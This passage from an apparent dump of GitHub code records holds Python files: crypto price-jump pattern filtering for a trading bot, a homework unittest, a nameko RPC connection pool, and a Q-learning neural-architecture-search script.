0.01 and dataRange[1].totalSell > dataRange[1].totalBuy:\r\n # return\r\n # elif dataRange[1].totalSell > 0.02:\r\n # return\r\n #\r\n # if dataRange[0].totalSell > 0.005 and dataRange[0].totalSell > dataRange[0].totalBuy:\r\n # return\r\n # elif dataRange[0].totalSell > 0.01:\r\n # return\r\n #\r\n #\r\n # if dataRange[-1].totalSell > 0.01 and dataRange[-1].totalSell > 
dataRange[-1].totalBuy:\r\n # return\r\n # elif dataRange[-1].totalSell > 0.1:\r\n # return\r\n # #\r\n # # if dataRange[1].totalBuy/dataRange[0].totalBuy > 6.0:\r\n # # return\r\n #\r\n if dataRange[0].transactionBuyCount > 0.0 and dataRange[-1].transactionBuyCount/dataRange[0].transactionBuyCount < 2.0:\r\n return\r\n # #\r\n if dataRange[0].totalBuy > 0.0 and dataRange[-1].totalBuy/dataRange[0].totalBuy < 7.0:\r\n return\r\n\r\n\r\n # if dataRange[0].totalBuy > 0.0 and dataRange[1].totalBuy/dataRange[0].totalBuy < 0.35:\r\n # return\r\n #\r\n # if dataRange[0].totalBuy > 0.0 and dataRange[2].totalBuy/dataRange[0].totalBuy < 0.35:\r\n # return\r\n\r\n if dataRange[0].firstPrice != 0.0:\r\n firstRatio = dataRange[0].lastPrice / dataRange[0].firstPrice\r\n if firstRatio < 1.004 or firstRatio > 1.055:\r\n return\r\n\r\n if dataRange[1].firstPrice != 0.0:\r\n firstRatio = dataRange[1].lastPrice / dataRange[1].firstPrice\r\n if firstRatio < 0.994 or firstRatio > 1.02:\r\n return\r\n\r\n if dataRange[2].firstPrice != 0.0:\r\n firstRatio = dataRange[2].lastPrice / dataRange[2].firstPrice\r\n if firstRatio < 0.99 or firstRatio > 1.016:\r\n return\r\n\r\n firstRatio = dataRange[-1].lastPrice / dataRange[-1].firstPrice\r\n if firstRatio < 0.998 or firstRatio > 1.01:\r\n return\r\n\r\n\r\n\r\n detailDataList = []\r\n self.__DivideDataInSeconds(jsonIn, 100, detailDataList, curPattern.startIndex-1, curPattern.endIndex+1)\r\n pattern.SetDetailedTransaction(detailDataList, dataRange)\r\n if pattern.maxDetailBuyPower < 0.045 or pattern.maxDetailBuyPower > 2.0:\r\n return\r\n\r\n basePrice = self.dataList[curIndex].lastPrice\r\n baseIndex = 0\r\n curIndexDetail = 0\r\n for detailPattern in detailDataList:\r\n if baseIndex == 0 and detailPattern.totalBuy > self.acceptedTransLimit:\r\n basePrice = detailPattern.lastPrice\r\n baseIndex = curIndexDetail\r\n curIndexDetail += 1\r\n\r\n totalSellCount = 0\r\n totalSellPower = 0.0\r\n for index in range(baseIndex+1, len(detailDataList)):\r\n totalSellPower += detailDataList[index].totalSell\r\n totalSellCount += (detailDataList[index].totalTransactionCount - detailDataList[index].transactionBuyCount)\r\n pattern.detailedHighestSellCountNumber = totalSellCount\r\n # if totalSellPower > 0.05:\r\n # return\r\n\r\n # if not pattern.isMaxBuyLater:\r\n # return\r\n if pattern.detailLen < 2:\r\n return\r\n #if self.timeList[-1] < 15:\r\n # return\r\n\r\n\r\n ratio = basePrice/self.jumpPrice\r\n curTimeDiff = (self.dataList[curIndex].timeInSecs - self.jumpTimeInSeconds)//60\r\n pattern.timeToJump = self.reportTimeInSeconds - self.dataList[curIndex].timeInSecs\r\n pattern.SetPeaks(self.riseList, self.timeList, ratio, curTimeDiff)\r\n\r\n if pattern.totalPeakCount15M > 2.0:\r\n return\r\n if pattern.totalPeakCount1Hour > 5.0:\r\n return\r\n # if pattern.lastUpRatio < -1.0:\r\n # return\r\n #\r\n # if pattern.peaks[-1] < 0.0 and pattern.lastDownRatio < -1.0:\r\n # return\r\n\r\n reverseRatio = 1/ratio\r\n if self.maxMinList[0] * reverseRatio < 0.75 or self.maxMinList[0] * reverseRatio > 0.98:\r\n return\r\n\r\n if self.maxMinList[2] * reverseRatio < 0.65 or self.maxMinList[4] * reverseRatio < 0.55:\r\n return\r\n\r\n\r\n moreDetailDataList = []\r\n self.__DivideDataInSeconds(jsonIn, 1, moreDetailDataList, self.dataList[curIndex].startIndex, self.dataList[curIndex].endIndex+1)\r\n pattern.SetDetailedTransaction(moreDetailDataList, dataRange)\r\n # if pattern.detailLen < 5:\r\n # return\r\n\r\n pattern.Append( dataRange, self.jumpTimeInSeconds, self.jumpPrice, 
self.marketState)\r\n\r\n #print(pattern.marketStateList)\r\n category = self.__GetCategory(curIndex,basePrice,pattern)\r\n if category == 0:\r\n self.mustBuyList.append(pattern)\r\n elif category == 1:\r\n self.addedCount += 1\r\n self.patternList.append(pattern)\r\n elif category == 2:\r\n self.badPatternList.append(pattern)\r\n self.addedCount += 1\r\n\r\n def __GetCategory(self, curIndex, priceIn, pattern):\r\n if self.isRise:\r\n if priceIn < self.reportPrice * 0.97:\r\n for i in range(curIndex+1, len(self.dataList)):\r\n ratio = self.dataList[i].lastPrice / priceIn\r\n timeDiff = self.dataList[i].endIndex - self.dataList[curIndex].endIndex\r\n #pattern.UpdatePrice(timeDiff, ratio)\r\n if ratio<0.98:\r\n return -1\r\n if ratio>1.03:\r\n #pattern.GoalReached(timeDiff, 1.03)\r\n return 1\r\n return -1\r\n else:\r\n for i in range(curIndex, len(self.dataList)):\r\n if self.dataList[i].lastPrice/priceIn<0.98:\r\n return 2\r\n if self.dataList[i].lastPrice/priceIn>1.03:\r\n return -1\r\n return 2\r\n\r\n return -1\r\n\r\n def __GetCategorySell(self, curIndex):\r\n price = self.dataList[curIndex].lastPrice\r\n minVal = self.dataList[curIndex].minPrice\r\n maxVal = self.dataList[curIndex].maxPrice\r\n time = self.dataList[curIndex].timeInSecs\r\n\r\n if self.isRise:\r\n if minVal < self.peakVal * 1.03:\r\n return 2 # We can keep\r\n\r\n else:\r\n if maxVal > self.peakVal * 0.995:\r\n return 1 # We need to sell now\r\n return -1\r\n\r\nclass SuddenChangeMerger:\r\n\r\n def __init__(self, transactionParam, marketState):\r\n self.mustBuyList = []\r\n self.patternList = []\r\n self.badPatternList = []\r\n\r\n self.mustSellList = []\r\n self.keepList = []\r\n\r\n self.handlerList = []\r\n self.peakHelperList = []\r\n self.transactionParam = transactionParam\r\n self.marketState = marketState\r\n\r\n def AddFile(self, jsonIn):\r\n for index in range(len(jsonIn)):\r\n if not jsonIn[index]:\r\n continue\r\n\r\n jsonPeakTrans = jsonIn[index]\r\n\r\n handler = SuddenChangeHandler(jsonPeakTrans,self.transactionParam,self.marketState)\r\n self.handlerList.append(handler)\r\n\r\n def Finalize(self):\r\n for peak in self.handlerList:\r\n self.__MergeInTransactions(peak)\r\n del peak\r\n self.Print()\r\n\r\n def toTransactionFeaturesNumpy(self):\r\n badCount = len(self.badPatternList)\r\n goodCount = len(self.patternList)\r\n #self.Print()\r\n #mustBuyCount = len(self.mustBuyList)\r\n print(\"Good count: \", goodCount, \" Bad Count: \", badCount)\r\n\r\n allData = np.concatenate( (self.patternList, self.badPatternList), axis=0)\r\n return allData\r\n\r\n def toTransactionResultsNumpy(self):\r\n badCount = len(self.badPatternList)\r\n goodCount = len(self.patternList)\r\n #mustBuyCount = len(self.mustBuyList)\r\n print(\"Good count: \", goodCount, \" Bad Count: \", badCount)\r\n #mustBuyResult = [2] * mustBuyCount\r\n goodResult = [1] * goodCount\r\n badResult = [0] * badCount\r\n returnPatternList = goodResult + badResult\r\n return returnPatternList\r\n\r\n def toSellTransactions(self):\r\n mustSellCount = len(self.mustSellList)\r\n keepCount = len(self.keepList)\r\n #self.Print()\r\n #mustBuyCount = len(self.mustBuyList)\r\n allData = np.concatenate( (self.mustSellList, self.keepList), axis=0)\r\n #print(allData)\r\n print(\"Must sell count: \", mustSellCount, \" Keep count: \", keepCount)\r\n return allData\r\n\r\n def toSellResultsNumpy(self):\r\n mustSellCount = len(self.mustSellList)\r\n keepCount = len(self.keepList)\r\n\r\n print(\"Must sell count: \", mustSellCount, \" Keep count: \", 
keepCount)\r\n mustSellResult = [0] * keepCount\r\n keepResult = [1] * mustSellCount\r\n returnPatternList = mustSellResult + keepResult\r\n return returnPatternList\r\n\r\n def Print(self):\r\n\r\n #mustBuyList = np.array(self.mustBuyList)\r\n buyList = np.array(self.patternList)\r\n badList = np.array(self.badPatternList)\r\n\r\n for i in range(len(self.patternList[0])):\r\n # a = {'Good': buyList[:, i],\r\n # 'Bad': badList[:, i]}\r\n #df = pd.DataFrame.from_dict( a, orient='index')\r\n #df = df.transpose()\r\n #df.plot.box()\r\n #mustBuyLegend = str(np.quantile(mustBuyList[:, i], 0.1)) + \",\" + str(np.quantile(mustBuyList[:, i], 0.5)) + \",\" + str(np.quantile(mustBuyList[:, i], 0.9))\r\n #buyLegend = str(np.quantile(buyList[:, i], 0.1)) + \",\" + str(np.quantile(buyList[:, i], 0.25)) + \",\" + str(np.quantile(buyList[:, i], 0.5)) + \",\" + str(np.quantile(buyList[:, i], 0.75)) + \",\" + str(np.quantile(buyList[:, i], 0.9))\r\n buyLegend = str(np.quantile(buyList[:, i], 0.1)) + \",\" + str(np.quantile(buyList[:, i], 0.9))\r\n\r\n if len(badList) > 0:\r\n badLegend = str(np.quantile(badList[:, i], 0.1)) + \",\" + str(np.quantile(badList[:, i], 0.25)) + \",\" + str(np.quantile(badList[:, i], 0.5)) + \",\" + str(np.quantile(badList[:, i], 0.75)) + \",\" + str(np.quantile(badList[:, i], 0.9))\r\n else:\r\n badLegend = \"empty\"\r\n #print(str(self.transactionParam.msec) ,\"_\" , str(i), \"_\" , buyLegend , \" \", badLegend)\r\n print(str(self.transactionParam.msec) ,\"_\" , str(i), \"_\" , buyLegend )\r\n\r\n #plt.savefig('Plots/' + str(self.transactionParam.msec) + \"_\" + str(i) + \"_box.pdf\")\r\n #plt.cla()\r\n #plt.clf()\r\n print(\"Good count: \", len(self.patternList))\r\n #plt.close()\r\n\r\n\r\n def __MergeInTransactions(self, handler):\r\n for pattern in handler.patternList:\r\n self.patternList.append(pattern.GetFeatures() + handler.GetFeatures())\r\n\r\n for pattern in handler.mustBuyList:\r\n self.mustBuyList.append(pattern.GetFeatures() + handler.GetFeatures())\r\n\r\n for pattern in handler.badPatternList:\r\n self.badPatternList.append(pattern.GetFeatures() + handler.GetFeatures())\r\n\r\n for pattern in handler.mustSellList:\r\n self.mustSellList.append(pattern.GetFeatures() )\r\n\r\n for pattern in handler.keepList:\r\n self.keepList.append(pattern.GetFeatures())\r\n\r\n\r\nclass SuddenChangeManager:\r\n\r\n def __init__(self, transactionParamList):\r\n self.marketState = MarketStateManager.MarketStateManager()\r\n #self.FeedMarketState()\r\n\r\n self.transParamList = transactionParamList\r\n self.suddenChangeMergerList = []\r\n self.CreateSuddenChangeMergers()\r\n print(self.suddenChangeMergerList)\r\n self.FeedChangeMergers()\r\n self.FinalizeMergers()\r\n badListArray = np.array(SuddenChangeHandler.fallTotalPower)\r\n goodListArray = np.array(SuddenChangeHandler.riseTotalPower)\r\n badLegend = str(np.quantile(badListArray, 0.1)) + \", \" + str(np.quantile(badListArray, 0.25)) + \" , ** \" \\\r\n + str(np.quantile(badListArray, 0.5)) + \" ** ,\" + str(np.quantile(badListArray, 0.75)) + \" , \" + str(\r\n np.quantile(badListArray, 0.9))\r\n goodLegend = str(np.quantile(goodListArray, 0.1)) + \" , \" + str(np.quantile(goodListArray, 0.25)) + \\\r\n \" , ** \" + str(np.quantile(goodListArray, 0.5)) + \" ** , \" + str(np.quantile(goodListArray, 0.75)) + \" , \" + str(\r\n np.quantile(goodListArray, 0.9))\r\n print(\" Good results \", goodLegend)\r\n print(\" Bad results \", badLegend)\r\n\r\n def FeedMarketState(self):\r\n jumpDataFolderPath = os.path.abspath(os.getcwd()) 
+ \"/Data/JumpData/\"\r\n onlyJumpFiles = [f for f in listdir(jumpDataFolderPath) if isfile(join(jumpDataFolderPath, f))]\r\n riseCount = 0\r\n downCount = 0\r\n for fileName in onlyJumpFiles:\r\n print(\"Reading market state\", jumpDataFolderPath + fileName, \" \")\r\n file = open(jumpDataFolderPath + fileName, \"r\")\r\n epoch = datetime.utcfromtimestamp(0)\r\n try:\r\n jsonDictionary = json.load(file)\r\n for jsonIn in jsonDictionary:\r\n if not jsonIn:\r\n continue\r\n\r\n tempTransaction = json.loads(jsonIn[\"transactions\"])\r\n if len(tempTransaction) == 0:\r\n continue\r\n timeStr = jsonIn[\"reportTime\"]\r\n datetime_object = datetime.strptime(timeStr.split(\".\")[0], '%Y-%b-%d %H:%M:%S')\r\n reportTimeInSeconds = (datetime_object - epoch).total_seconds()\r\n\r\n lastTimeInSeconds = int(tempTransaction[-1][\"T\"]) // 1000\r\n if reportTimeInSeconds - lastTimeInSeconds > 1500:\r\n reportTimeInSeconds -= 3600\r\n isRise = bool(jsonIn[\"isRise\"])\r\n if isRise:\r\n riseCount += 1\r\n else:\r\n downCount += 1\r\n self.marketState.add(isRise, reportTimeInSeconds)\r\n except Exception as e:\r\n print(\"There was a exception in \", fileName, e)\r\n if IsOneFileOnly:\r\n break\r\n self.marketState.sort()\r\n print(\"Total rise: \", riseCount, \" total down: \", downCount)\r\n\r\n def FeedChangeMergers(self):\r\n jumpDataFolderPath = os.path.abspath(os.getcwd()) + \"/Data/JumpData/\"\r\n onlyJumpFiles = [f for f in listdir(jumpDataFolderPath) if isfile(join(jumpDataFolderPath, f))]\r\n for fileName in onlyJumpFiles:\r\n print(\"Reading Jump\", jumpDataFolderPath + fileName, \" \")\r\n file = open(jumpDataFolderPath + fileName, \"r\")\r\n #try:\r\n jsonDictionary = json.load(file)\r\n for merger in self.suddenChangeMergerList:\r\n merger.AddFile(jsonDictionary)\r\n #except Exception as e:\r\n # print(\"There was a exception in \", fileName, e )\r\n if IsOneFileOnly:\r\n break\r\n\r\n def toTransactionFeaturesNumpy(self, index):\r\n return self.suddenChangeMergerList[index].toTransactionFeaturesNumpy()\r\n\r\n def toTransactionResultsNumpy(self, index):\r\n return self.suddenChangeMergerList[index].toTransactionResultsNumpy()\r\n\r\n def toSellTransactions(self, index):\r\n return self.suddenChangeMergerList[index].toSellTransactions()\r\n\r\n def toSellResultsNumpy(self, index):\r\n return self.suddenChangeMergerList[index].toSellResultsNumpy()\r\n\r\n def FinalizeMergers(self):\r\n for transactionIndex in range(len(self.transParamList)):\r\n self.suddenChangeMergerList[transactionIndex].Finalize()\r\n\r\n def CreateSuddenChangeMergers(self):\r\n for transactionIndex in range(len(self.transParamList)):\r\n newMerger = SuddenChangeMerger(self.transParamList[transactionIndex], self.marketState)\r\n self.suddenChangeMergerList.append(newMerger)","repo_name":"kerdemdemir/SnakeBot","sub_path":"SuddenChangeTransactions.py","file_name":"SuddenChangeTransactions.py","file_ext":"py","file_size_in_byte":25777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19149140954","text":"from homework3 import create_dataframe \nimport unittest \n\n\nclass TestHomework3(unittest.TestCase):\n # test whether the dataframe returned contains the right column names\n def test_column_names(self):\n inputdf = create_dataframe('./class.db')\n inputdfColumns, testColumns = list(inputdf.columns), ['video_id', 'category_id', 'language']\n checkColumnInd = not bool(set(inputdfColumns).difference(set(testColumns))) \n self.assertTrue(checkColumnInd)\n\n # test 
whether the dataframe returned contains the right number of rows\n def test_table_rows(self):\n inputdf = create_dataframe('./class.db')\n self.assertTrue(inputdf.shape[0] == 75005)\n \n # test whether the columns ['video_id', 'category_id' and 'language'] is a key\n def test_key_columns(self):\n inputdf = create_dataframe('./class.db')\n rows = inputdf.shape[0]\n uniqueValuesOfColumns = inputdf.groupby(['video_id', 'category_id', 'language']).size().shape[0]\n self.assertTrue(rows == uniqueValuesOfColumns)\n \n # test whether the correct exception is generated when an invalid path is provided.\n def test_exception_type(self):\n \twith self.assertRaises(ValueError):\n create_dataframe('wrongDatabasePath')\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"uwseds-sp18/homework-3-jasonfeiwang","sub_path":"test_homework3.py","file_name":"test_homework3.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39947596873","text":"\"\"\"\nsource reference: https://github.com/nameko/nameko/pull/357\n\"\"\"\nimport weakref\nimport os\n\nfrom six.moves import xrange as xrange_six, queue as queue_six\nfrom nameko.standalone.rpc import ClusterRpcClient\nfrom nameko import config\nfrom nameko.cli.utils.config import setup_config\n\nclass ClusterRpcProxyPool(object):\n \"\"\" Connection pool for Nameko RPC cluster.\n Pool size can be customized by passing `pool_size` kwarg to constructor.\n Default size is 2 per uvicorn worker (should be enough)\n *Usage*\n pool = ClusterRpcProxyPool(config)\n pool.start()\n # ...\n with pool.next() as rpc:\n rpc.mailer.send_mail(foo='bar')\n # ...\n pool.stop()\n This class is thread-safe and designed to work with GEvent.\n \"\"\"\n class RpcContext(object):\n def __init__(self, pool, uri, timeout):\n self.pool = weakref.proxy(pool)\n self.proxy = ClusterRpcClient(uri=uri, timeout=timeout)\n self.rpc = self.proxy.start()\n\n def stop(self):\n self.proxy.stop()\n self.proxy = None\n self.rpc = None\n\n def __enter__(self):\n return self.rpc\n\n def __exit__(self, *args, **kwargs):\n try:\n self.pool._put_back(self)\n except ReferenceError: # pragma: no cover\n # We're detached from the parent, so this context\n # is going to silently die.\n self.stop()\n\n def __init__(self, uri, timeout=None, pool_size=2):\n self.uri = uri\n self.timeout = timeout\n self.pool_size = pool_size\n\n def start(self):\n \"\"\" Populate pool with connections.\n \"\"\"\n self.queue = queue_six.Queue()\n for i in xrange_six(self.pool_size):\n ctx = ClusterRpcProxyPool.RpcContext(self, self.uri, self.timeout)\n self.queue.put(ctx)\n\n def next(self, timeout=None):\n \"\"\" Fetch next connection.\n This method is thread-safe.\n \"\"\"\n return self.queue.get(timeout=timeout)\n\n def _put_back(self, ctx):\n self.queue.put(ctx)\n\n def stop(self):\n \"\"\" Stop queue and remove all connections from pool.\n \"\"\"\n while True:\n try:\n ctx = self.queue.get_nowait()\n ctx.stop()\n except queue_six.Empty:\n break\n self.queue.queue.clear()\n self.queue = None\n\n# Global/Module pool\nif os.path.exists('config.yml'):\n with open('config.yml', 'r') as config_file:\n setup_config(config_file)\nelse:\n raise Exception(\"config.yml configuration file not found\")\n\nNAMEKO_POOL = ClusterRpcProxyPool(\n uri=config['AMQP_URI'],\n timeout=None\n)\nNAMEKO_POOL.start()\n\ndef destroy_nameko_pool():\n NAMEKO_POOL.stop()\n\ndef get_rpc():\n yield NAMEKO_POOL\n\nconfig = 
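# A minimal standalone sketch of the pooling pattern used by ClusterRpcProxyPool
# in the dependencies.py record above: pre-create a fixed number of reusable
# resources, hand them out from a queue.Queue, and always put them back via a
# context manager. FakeConnection and the pool size are illustrative
# assumptions for the sketch, not part of nameko's API.
import queue
from contextlib import contextmanager

class FakeConnection:
    def close(self):
        pass

class SimplePool:
    def __init__(self, factory, size=2):
        self._queue = queue.Queue()
        for _ in range(size):
            self._queue.put(factory())

    @contextmanager
    def acquire(self, timeout=None):
        conn = self._queue.get(timeout=timeout)
        try:
            yield conn
        finally:
            self._queue.put(conn)  # return the connection so others can reuse it

    def stop(self):
        while not self._queue.empty():
            self._queue.get_nowait().close()

pool = SimplePool(FakeConnection, size=2)
with pool.acquire() as conn:
    pass  # use conn here
pool.stop()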
config","repo_name":"gitricko/nameko-devex","sub_path":"gateapi/gateapi/api/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42707292084","text":"import os\nimport time\nimport numpy as np\nimport pandas as pd\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom lib.MetaQNN.cnn import parse as cnn_parse\nimport state_enumerator as se\nfrom state_string_utils import StateStringUtils\nfrom lib.Models.network import net\nfrom lib.Training.train import train\nfrom lib.Training.validate import validate\nfrom lib.Training.learning_rate_scheduling import LearningRateScheduler\nfrom lib.Utility.pytorch_modelsize import SizeEstimator\nfrom lib.Utility.utils import GPUMem\n\nclass QValues:\n def __init__(self):\n self.q = {}\n\n def save_to_csv(self, q_csv_path):\n start_layer_type = []\n start_layer_depth = []\n start_filter_depth = []\n start_filter_size = []\n start_stride = []\n start_image_size = []\n start_fc_size = []\n start_terminate = []\n end_layer_type = []\n end_layer_depth = []\n end_filter_depth = []\n end_filter_size = []\n end_stride = []\n end_image_size = []\n end_fc_size = []\n end_terminate = []\n utility = []\n for start_state_list in self.q.keys():\n start_state = se.State(state_list=start_state_list)\n for to_state_ix in range(len(self.q[start_state_list]['actions'])):\n to_state = se.State(state_list=self.q[start_state_list]['actions'][to_state_ix])\n utility.append(self.q[start_state_list]['utilities'][to_state_ix])\n start_layer_type.append(start_state.layer_type)\n start_layer_depth.append(start_state.layer_depth)\n start_filter_depth.append(start_state.filter_depth)\n start_filter_size.append(start_state.filter_size)\n start_stride.append(start_state.stride)\n start_image_size.append(start_state.image_size)\n start_fc_size.append(start_state.fc_size)\n start_terminate.append(start_state.terminate)\n end_layer_type.append(to_state.layer_type)\n end_layer_depth.append(to_state.layer_depth)\n end_filter_depth.append(to_state.filter_depth)\n end_filter_size.append(to_state.filter_size)\n end_stride.append(to_state.stride)\n end_image_size.append(to_state.image_size)\n end_fc_size.append(to_state.fc_size)\n end_terminate.append(to_state.terminate)\n\n q_csv = pd.DataFrame({'start_layer_type': start_layer_type,\n 'start_layer_depth': start_layer_depth,\n 'start_filter_depth': start_filter_depth,\n 'start_filter_size': start_filter_size,\n 'start_stride': start_stride,\n 'start_image_size': start_image_size,\n 'start_fc_size': start_fc_size,\n 'start_terminate': start_terminate,\n 'end_layer_type': end_layer_type,\n 'end_layer_depth': end_layer_depth,\n 'end_filter_depth': end_filter_depth,\n 'end_filter_size': end_filter_size,\n 'end_stride': end_stride,\n 'end_image_size': end_image_size,\n 'end_fc_size': end_fc_size,\n 'end_terminate': end_terminate,\n 'utility': utility})\n q_csv.to_csv(q_csv_path, index=False)\n\n def load_q_values(self, q_csv_path):\n self.q = {}\n q_csv = pd.read_csv(q_csv_path)\n for row in zip(*[q_csv[col].values.tolist() for col in ['start_layer_type',\n 'start_layer_depth',\n 'start_filter_depth',\n 'start_filter_size',\n 'start_stride',\n 'start_image_size',\n 'start_fc_size',\n 'start_terminate',\n 'end_layer_type',\n 'end_layer_depth',\n 'end_filter_depth',\n 'end_filter_size',\n 'end_stride',\n 'end_image_size',\n 'end_fc_size',\n 
'end_terminate',\n 'utility']]):\n start_state = se.State(layer_type = row[0],\n layer_depth = row[1],\n filter_depth = row[2],\n filter_size = row[3],\n stride = row[4],\n image_size = row[5],\n fc_size = row[6],\n terminate = row[7]).as_tuple()\n end_state = se.State(layer_type = row[8],\n layer_depth = row[9],\n filter_depth = row[10],\n filter_size = row[11],\n stride = row[12],\n image_size = row[13],\n fc_size = row[14],\n terminate = row[15]).as_tuple()\n utility = row[16]\n\n if start_state not in self.q:\n self.q[start_state] = {'actions': [end_state], 'utilities': [utility]}\n else:\n self.q[start_state]['actions'].append(end_state)\n self.q[start_state]['utilities'].append(utility)\n\nclass QLearner:\n def __init__(self,\n state_space_parameters, \n epsilon,\n WeightInitializer=None,\n device=None,\n args=None,\n save_path=None,\n state=None,\n qstore=None,\n replaydict = None,\n replay_dictionary = pd.DataFrame(columns=['net',\n 'spp_size',\n 'reward',\n 'epsilon',\n 'train_flag'])):\n self.state_list = []\n self.state_space_parameters = state_space_parameters\n self.args = args\n self.enum = se.StateEnumerator(state_space_parameters, args)\n self.stringutils = StateStringUtils(state_space_parameters, args)\n self.state = se.State('start', 0, 1, 0, 0, args.patch_size, 0, 0) if not state else state\n self.qstore = QValues() \n if type(qstore) is not type(None):\n self.qstore.load_q_values(qstore)\n self.replay_dictionary = pd.read_csv(replaydict, index_col=0)\n else:\n self.replay_dictionary = replay_dictionary\n self.epsilon = epsilon\n self.WeightInitializer = WeightInitializer\n self.device = device\n self.gpu_mem_0 = GPUMem(torch.device('cuda') == self.device)\n self.save_path = save_path\n # TODO: hard-coded arc no. to resume from if epsilon < 1\n self.count = args.continue_ite - 1 #137 (hard-coded no. 
for epsilon < 1)\n\n def generate_net(self, epsilon=None, dataset=None):\n if epsilon != None:\n self.epsilon = epsilon\n self.__reset_for_new_walk()\n state_list = self.__run_agent()\n\n net_string = self.stringutils.state_list_to_string(state_list, num_classes=len(dataset.val_loader.dataset.class_to_idx))\n\n train_flag = True\n if net_string in self.replay_dictionary['net'].values:\n spp_size = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['spp_size'].values[0]\n hard_best_val = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['reward'].values[0]\n train_flag = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['train_flag'].values[0]\n\n self.replay_dictionary = self.replay_dictionary.append(pd.DataFrame([[net_string, spp_size, hard_best_val,\n self.epsilon, train_flag]],\n columns=['net', \n 'spp_size',\n 'reward',\n 'epsilon',\n 'train_flag']),\n ignore_index=True)\n self.count += 1\n self.replay_dictionary.to_csv(os.path.join(self.save_path,'replayDict' + str(self.count) + '.csv'))\n self.sample_replay_for_update()\n self.qstore.save_to_csv(os.path.join(self.save_path,'qVal' + str(self.count) + '.csv'))\n else:\n spp_size, hard_best_val, train_flag = self.__train_val_net(state_list, self.state_space_parameters, dataset)\n flag_net_string_present = False\n while spp_size is None:\n print('=' * 80)\n print(\"arc failed mem check..sampling again!\")\n print('=' * 80)\n self.__reset_for_new_walk()\n state_list = self.__run_agent()\n net_string = self.stringutils.state_list_to_string(state_list, num_classes=len(dataset.val_loader.dataset.class_to_idx))\n if net_string in self.replay_dictionary['net'].values:\n spp_size = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['spp_size'].values[0]\n hard_best_val = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['reward'].values[0]\n train_flag = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['train_flag'].values[0]\n\n self.replay_dictionary = self.replay_dictionary.append(pd.DataFrame([[net_string, spp_size, hard_best_val,\n self.epsilon, train_flag]],\n columns=['net', \n 'spp_size',\n 'reward',\n 'epsilon']),\n ignore_index=True)\n self.count += 1\n self.replay_dictionary.to_csv(os.path.join(self.save_path,'replayDict' + str(self.count) + '.csv'))\n self.sample_replay_for_update()\n self.qstore.save_to_csv(os.path.join(self.save_path,'qVal' + str(self.count) + '.csv'))\n flag_net_string_present = True\n break\n spp_size, hard_best_val, train_flag = \\\n self.__train_val_net(state_list, self.state_space_parameters, dataset)\n \n if flag_net_string_present == False:\n\n self.replay_dictionary = self.replay_dictionary.append(pd.DataFrame([[net_string, spp_size, hard_best_val,\n self.epsilon, train_flag]],\n columns=['net', \n 'spp_size',\n 'reward',\n 'epsilon',\n 'train_flag']),\n ignore_index=True)\n self.count += 1\n self.replay_dictionary.to_csv(os.path.join(self.save_path,'replayDict' + str(self.count) + '.csv'))\n self.sample_replay_for_update()\n self.qstore.save_to_csv(os.path.join(self.save_path,'qVal' + str(self.count) + '.csv'))\n\n # if train_flag == True:\n print('Reward:{}'.format(hard_best_val))\n\n def __train_val_net(self, state_list, state_space_parameters, dataset):\n best_prec = 0.\n num_classes = len(dataset.val_loader.dataset.class_to_idx)\n net_input, _ = next(iter(dataset.val_loader))\n\n model = net(state_list, state_space_parameters, num_classes, net_input, self.args.batch_norm, 
self.args.drop_out_drop)\n\n print(model)\n print('-' * 80)\n print('SPP levels: {}'.format(model.spp_filter_size))\n print('-' * 80)\n print ('Estimated total gpu usage of model: {gpu_usage:.4f} GB'.format(gpu_usage = model.gpu_usage))\n model_activations_gpu = model.gpu_usage\n cudnn.benchmark = True\n self.WeightInitializer.init_model(model)\n model = model.to(self.device)\n print('available:{}'.format((self.gpu_mem_0.total_mem - self.gpu_mem_0.total_mem*self.gpu_mem_0.get_mem_util())/1024.))\n print('required per gpu with buffer: {}'.format((3./float(self.args.no_gpus)*model_activations_gpu) + 1))\n print('-' * 80)\n if ((self.gpu_mem_0.total_mem - self.gpu_mem_0.total_mem*self.gpu_mem_0.get_mem_util())/1024.) < ((3./float(self.args.no_gpus)*model_activations_gpu) + 1): \n del model\n return [None] * 12\n if int(self.args.no_gpus)>1:\n model = torch.nn.DataParallel(model)\n criterion = nn.BCELoss(size_average = True).to(self.device)\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()),\n lr=self.args.learning_rate,\n momentum=self.args.momentum, weight_decay=self.args.weight_decay)\n lr_scheduler = LearningRateScheduler(self.args.lr_wr_epochs, len(dataset.train_loader.dataset), self.args.batch_size,\n self.args.learning_rate, self.args.lr_wr_mul, self.args.lr_wr_min)\n\n train_flag = True\n epoch = 0\n while epoch < self.args.epochs:\n train(dataset, model, criterion, epoch, optimizer, lr_scheduler, self.device, self.args)\n prec = validate(dataset, model, criterion, epoch, self.device, self.args)\n best_prec = max(prec, best_prec)\n # TODO: hard-coded early stopping criterion of last prec < 15%\n if epoch==(self.args.lr_wr_epochs - 1) and float(prec)<(1.5 *100./10):\n train_flag = False\n break\n epoch += 1\n if self.args.no_gpus>1:\n spp_filter_size = model.module.spp_filter_size\n else:\n spp_filter_size = model.spp_filter_size\n del model, criterion, optimizer, lr_scheduler\n return spp_filter_size, best_prec, train_flag\n\n def __reset_for_new_walk(self):\n\n self.state_list = []\n self.state = se.State('start', 0, 1, 0, 0, self.args.patch_size, 0, 0)\n\n def __run_agent(self):\n\n while self.state.terminate == 0:\n self.__transition_q_learning()\n\n return self.state_list\n\n def __transition_q_learning(self):\n if self.state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(self.state, self.qstore.q) \n action_values = self.qstore.q[self.state.as_tuple()]\n if np.random.random() < self.epsilon:\n action = se.State(state_list=action_values['actions'][np.random.randint(len(action_values['actions']))])\n else:\n 